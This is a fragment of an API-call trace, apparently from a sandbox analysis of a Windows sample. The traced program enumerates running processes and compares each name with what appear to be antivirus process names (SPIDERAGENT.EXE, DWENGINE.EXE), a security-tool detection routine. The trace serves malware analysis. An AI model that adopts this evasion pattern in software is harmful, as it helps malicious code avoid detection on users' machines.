CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.442] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.442] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.443] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.443] lstrlenW (lpString="cmd.exe") returned 7 [0163.443] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.443] lstrcmpW (lpString1="CMD.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.443] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.443] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.443] lstrlenW (lpString="conhost.exe") returned 11 [0163.443] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.444] lstrcmpW (lpString1="CONHOST.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.444] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.444] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.444] lstrlenW (lpString="PING.EXE") returned 8 [0163.444] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.444] lstrcmpW (lpString1="PING.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.444] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.445] CloseHandle (hObject=0xe0) returned 1 [0163.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.447] lstrcpyW (in: lpString1=0x18f8e4, lpString2="DWENGINE.EXE" | out: lpString1="DWENGINE.EXE") returned="DWENGINE.EXE" [0163.447] lstrlenW (lpString="DWENGINE.EXE") returned 12 [0163.447] CharUpperBuffW (in: lpsz="DWENGINE.EXE", cchLength=0xc | out: lpsz="DWENGINE.EXE") returned 0xc [0163.447] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.447] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.447] lstrlenW (lpString="[System Process]") returned 16 [0163.447] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.447] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="DWENGINE.EXE") returned -1 [0163.448] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.448] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.448] lstrlenW (lpString="System") returned 6 [0163.448] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.448] lstrcmpW (lpString1="SYSTEM", lpString2="DWENGINE.EXE") returned 1 [0163.448] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.449] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.449] lstrlenW (lpString="smss.exe") returned 8 [0163.449] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.449] lstrcmpW (lpString1="SMSS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.449] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, 
th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.450] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.450] lstrlenW (lpString="csrss.exe") returned 9 [0163.450] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.450] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.450] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.450] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.450] lstrlenW (lpString="wininit.exe") returned 11 [0163.450] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.450] lstrcmpW (lpString1="WININIT.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.450] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.451] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.451] lstrlenW (lpString="csrss.exe") returned 9 [0163.451] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.451] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.451] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, 
szExeFile="winlogon.exe")) returned 1 [0163.452] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.452] lstrlenW (lpString="winlogon.exe") returned 12 [0163.452] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.452] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.452] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.453] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.453] lstrlenW (lpString="services.exe") returned 12 [0163.453] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.453] lstrcmpW (lpString1="SERVICES.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.453] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.453] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.453] lstrlenW (lpString="lsass.exe") returned 9 [0163.453] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.453] lstrcmpW (lpString1="LSASS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.453] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 
[0163.454] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.454] lstrlenW (lpString="lsm.exe") returned 7 [0163.454] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.454] lstrcmpW (lpString1="LSM.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.454] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.455] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.455] lstrlenW (lpString="svchost.exe") returned 11 [0163.455] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.455] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.455] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.456] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.456] lstrlenW (lpString="svchost.exe") returned 11 [0163.456] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.456] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.456] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.456] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" 
| out: lpString1="svchost.exe") returned="svchost.exe" [0163.456] lstrlenW (lpString="svchost.exe") returned 11 [0163.456] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.456] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.456] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.457] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.457] lstrlenW (lpString="svchost.exe") returned 11 [0163.457] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.457] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.457] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.458] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.458] lstrlenW (lpString="svchost.exe") returned 11 [0163.458] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.458] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.458] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.459] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") 
returned="audiodg.exe" [0163.459] lstrlenW (lpString="audiodg.exe") returned 11 [0163.459] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.459] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.459] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.460] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.460] lstrlenW (lpString="svchost.exe") returned 11 [0163.460] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.460] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.460] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.460] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.460] lstrlenW (lpString="svchost.exe") returned 11 [0163.460] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.460] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.460] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.461] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.461] 
lstrlenW (lpString="spoolsv.exe") returned 11 [0163.461] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.461] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.461] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.462] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.462] lstrlenW (lpString="svchost.exe") returned 11 [0163.462] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.462] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.462] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.463] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.463] lstrlenW (lpString="taskhost.exe") returned 12 [0163.463] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.463] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.463] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.463] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.463] lstrlenW 
(lpString="taskeng.exe") returned 11 [0163.463] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.463] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.464] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.464] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.464] lstrlenW (lpString="dwm.exe") returned 7 [0163.464] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.464] lstrcmpW (lpString1="DWM.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.464] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.465] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.465] lstrlenW (lpString="explorer.exe") returned 12 [0163.465] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.465] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.465] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.466] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.466] lstrlenW (lpString="taskeng.exe") returned 11 [0163.466] CharUpperBuffW 
(in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.466] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.466] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.466] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.466] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.466] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.466] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.466] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.467] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.467] lstrlenW (lpString="taskhost.exe") returned 12 [0163.467] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.467] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.467] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.468] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.468] lstrlenW (lpString="calls ccd copyright.exe") returned 
23 [0163.468] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.468] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.468] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.469] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.469] lstrlenW (lpString="tri.exe") returned 7 [0163.469] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.469] lstrcmpW (lpString1="TRI.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.469] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.469] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.470] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.470] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.470] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.470] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.470] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") 
returned="chevrolet-play-mel.exe" [0163.470] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.470] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.470] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.470] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.471] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.471] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.471] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.471] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.471] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.472] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.472] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.472] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.472] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.472] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, 
